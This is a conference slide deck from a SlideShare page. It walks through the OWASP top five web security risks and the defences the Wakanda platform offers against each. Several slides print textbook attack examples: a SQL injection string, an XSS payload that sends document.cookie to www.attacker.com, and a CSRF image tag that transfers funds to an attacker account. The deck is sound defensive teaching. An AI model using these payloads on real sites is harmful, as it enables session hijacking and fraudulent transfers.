Wakanda and theTop 5 Security Risks     by Alexandre Morgaut
Presentation•   Wakanda Community manager•   W3C AC member•   Web Architect•   JS Expert, REST Lover, NoSQL Fanboy•   W3C ...
Agenda•   The Open Web Application Security Project•   Top 10 Application Security Risks•   Zoom on Top 5    •   A1 - Inje...
OWASP•   The Open Web Application Security Project•   started in 2001 by Mark Curphey and Dennis Groves•   includes corpor...
Top 10 Risks•   A1 - Injection•   A2 - Cross-Site Scripting (XSS)•   A3 - Broken Authentication & Session Management•   A4...
Injection• Attacks • SQL Injections, JS injections • deferred Injections
SQL Injectionquery = "SELECT * FROM accounts WHERE custID=" + request.getParameter("id") +"";http://example.com/app/accoun...
Injection•   Attacks    •   SQL Injections, JS injections    •   deferred Injections•   Preventions    •   Input check, qu...
Wakanda Security• NoSQL• Query parameters• User Access Right at the Database level  • CRUD + execution Access Rights  • Re...
Cross-Site Scripting         (XSS)• Attacks • stored, reflected, DOM based • JS injection in the UI
XSS Attack
XSS Attackpage += "<input name=creditcard type=TEXT‘ value=" + request.getParameter("CC") + ">";
XSS Attackpage += "<input name=creditcard type=TEXT‘ value=" + request.getParameter("CC") + ">";              http://examp...
Cross-Site Scripting         (XSS)• Attacks • stored, reflected, DOM based • JS injection in the UI• Prevention • validate...
Wakanda Security• Static HTML files• Data inclusion based on datasources• output escaped by default• Beware  • WYSIWYG wid...
Broken Authentication &     Session Management• Attacks • session fixation in URL or Form • session hijacking
Broken Authentication &          Session Managementhttp://example.com/sale/saleitems;jsessionid= 2P0OC2JDPXM0OQSNDLPSKHCJU...
Broken Authentication &      Session Management• Attacks • session fixation in URL or Form • session hijacking• Prevention...
Wakanda Security• Session IDs managed automatically  • HTTP only restriction  • No session ID in URL or Form  • Check of u...
Insecure Direct Object Reference• Attacks • changed accessed resource URL
Insecure Direct Object Reference
Insecure Direct Object Referencequery = "SELECT * FROM accts WHERE account = ?";pstmt = connection.prepareStatement(query ...
Insecure Direct Object Referencequery = "SELECT * FROM accts WHERE account = ?";pstmt = connection.prepareStatement(query ...
Insecure Direct Object Reference• Attacks • changed accessed resource URL• Prevention • Indirect resource reference • Chec...
Wakanda Security• Access always checked by the REST API• User Authenticated at database level• Restricting Queries  • Exte...
Cross-Site Request Forgery (CSRF)• Attacks • HTTP request unintentionally sent
Cross-Site Request Forgery (CSRF)
Cross-Site Request Forgery (CSRF)             Transfert API
Cross-Site Request Forgery (CSRF)                          Transfert API  http://app.com/transferFunds?amount=1500 &destAc...
Cross-Site Request Forgery (CSRF)                          Transfert API  http://app.com/transferFunds?amount=1500 &destAc...
Cross-Site Request Forgery (CSRF)                                  Transfert API          http://app.com/transferFunds?amo...
Cross-Site Request Forgery (CSRF)• Attacks • HTTP request unintentionally sent• Prevention • validate any input   • use UR...
TOP 10 Riskshttps://www.owasp.org/index.php/Top_10_2010-Main   https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Proj...
Upcoming SlideShare
Loading in …5
×

Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe

5,576 views

Published on

Published in: Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
5,576
On SlideShare
0
From Embeds
0
Number of Embeds
45
Actions
Shares
0
Downloads
28
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe

  1. Wakanda and theTop 5 Security Risks by Alexandre Morgaut
  2. Presentation• Wakanda Community manager• W3C AC member• Web Architect• JS Expert, REST Lover, NoSQL Fanboy• W3C “jseverywhere“ community group @amorgaut
  3. Agenda• The Open Web Application Security Project• Top 10 Application Security Risks• Zoom on Top 5 • A1 - Injection • A2 - Cross-Site Scripting (XSS) • A3 - Broken Authentication & Session Management • A4 - Insecure Direct Object Reference • A5 - Cross Site Request Forgery (CSRF)
  4. OWASP• The Open Web Application Security Project• started in 2001 by Mark Curphey and Dennis Groves• includes corporations, educational organizations, and individuals• Cheat Sheets, Training, Books• AppSec Conferences• TOP 10 Security Risks https://www.owasp.org
  5. Top 10 Risks• A1 - Injection• A2 - Cross-Site Scripting (XSS)• A3 - Broken Authentication & Session Management• A4 - Insecure Direct Object Reference• A5 - Cross Site Request Forgery (CSRF)• A6 - Security Misconfiguration• A7 - Insecure Cryptographic Storage• A8 - Failure to Restrict URL Access• A9 - Insufficient Transport Layer Protection• A10 - Unvalidated Redirects and Forwards
  6. Injection• Attacks • SQL Injections, JS injections • deferred Injections
  7. SQL Injectionquery = "SELECT * FROM accounts WHERE custID=" + request.getParameter("id") +"";http://example.com/app/accountView?id= or 1=1
  8. Injection• Attacks • SQL Injections, JS injections • deferred Injections• Preventions • Input check, query parameters • Eval is Evil • new Function() == deferred eval() • no dynamically created JS query expression
  9. Wakanda Security• NoSQL• Query parameters• User Access Right at the Database level • CRUD + execution Access Rights • Restricting queries • onRestrictingQuery handler
  10. Cross-Site Scripting (XSS)• Attacks • stored, reflected, DOM based • JS injection in the UI
  11. XSS Attack
  12. XSS Attackpage += "<input name=creditcard type=TEXT‘ value=" + request.getParameter("CC") + ">";
  13. XSS Attackpage += "<input name=creditcard type=TEXT‘ value=" + request.getParameter("CC") + ">"; http://example.com/?CC=><script>document.location= http://www.attacker.com/cgi-bin/cookie.cgi? foo=+document.cookie</script>.
  14. Cross-Site Scripting (XSS)• Attacks • stored, reflected, DOM based • JS injection in the UI• Prevention • validate any input • escape output
  15. Wakanda Security• Static HTML files• Data inclusion based on datasources• output escaped by default• Beware • WYSIWYG widget + on Row Draw • deferred effect
  16. Broken Authentication & Session Management• Attacks • session fixation in URL or Form • session hijacking
  17. Broken Authentication & Session Managementhttp://example.com/sale/saleitems;jsessionid= 2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii
  18. Broken Authentication & Session Management• Attacks • session fixation in URL or Form • session hijacking• Prevention • check session owner • session in HTTP only cookie • reasonable timeout
  19. Wakanda Security• Session IDs managed automatically • HTTP only restriction • No session ID in URL or Form • Check of user session owner • Check of user-agent session owner
  20. Insecure Direct Object Reference• Attacks • changed accessed resource URL
  21. Insecure Direct Object Reference
  22. Insecure Direct Object Referencequery = "SELECT * FROM accts WHERE account = ?";pstmt = connection.prepareStatement(query , ... );pstmt.setString( 1, request.getparameter("acct"));results = pstmt.executeQuery( );
  23. Insecure Direct Object Referencequery = "SELECT * FROM accts WHERE account = ?";pstmt = connection.prepareStatement(query , ... );pstmt.setString( 1, request.getparameter("acct"));results = pstmt.executeQuery( ); http://example.com/app/accountInfo?acct=notmyacct
  24. Insecure Direct Object Reference• Attacks • changed accessed resource URL• Prevention • Indirect resource reference • Check all resource access rights
  25. Wakanda Security• Access always checked by the REST API• User Authenticated at database level• Restricting Queries • Extended DataClass • Current User or Current Group check
  26. Cross-Site Request Forgery (CSRF)• Attacks • HTTP request unintentionally sent
  27. Cross-Site Request Forgery (CSRF)
  28. Cross-Site Request Forgery (CSRF) Transfert API
  29. Cross-Site Request Forgery (CSRF) Transfert API http://app.com/transferFunds?amount=1500 &destAccount=4673243243
  30. Cross-Site Request Forgery (CSRF) Transfert API http://app.com/transferFunds?amount=1500 &destAccount=4673243243 Give a Picture URL
  31. Cross-Site Request Forgery (CSRF) Transfert API http://app.com/transferFunds?amount=1500 &destAccount=4673243243 Give a Picture URL<img src="http://app.com/transferFunds?amount=1500&destAccount=AttackerAccount#“width="0" height="0">
  32. Cross-Site Request Forgery (CSRF)• Attacks • HTTP request unintentionally sent• Prevention • validate any input • use URL manipulations APIs • escape output • use Tokens in forms
  33. TOP 10 Riskshttps://www.owasp.org/index.php/Top_10_2010-Main https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

×